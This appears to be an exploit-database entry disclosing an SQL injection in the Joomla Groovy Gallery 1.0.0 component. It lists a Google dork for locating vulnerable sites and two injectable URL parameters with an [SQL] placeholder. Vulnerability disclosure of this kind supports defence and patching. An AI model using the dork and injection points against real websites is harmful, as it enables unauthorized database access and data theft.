18 lines
No EOL
763 B
Text
18 lines
No EOL
763 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_groovygallery
|
|
# Date: 17.02.2017
|
|
# Vendor Homepage: http://addonstreet.com/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
|
|
# Demo: http://addonstreet.com/products/groovy-gallery
|
|
# Version: 1.0.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
|
|
# # # # # |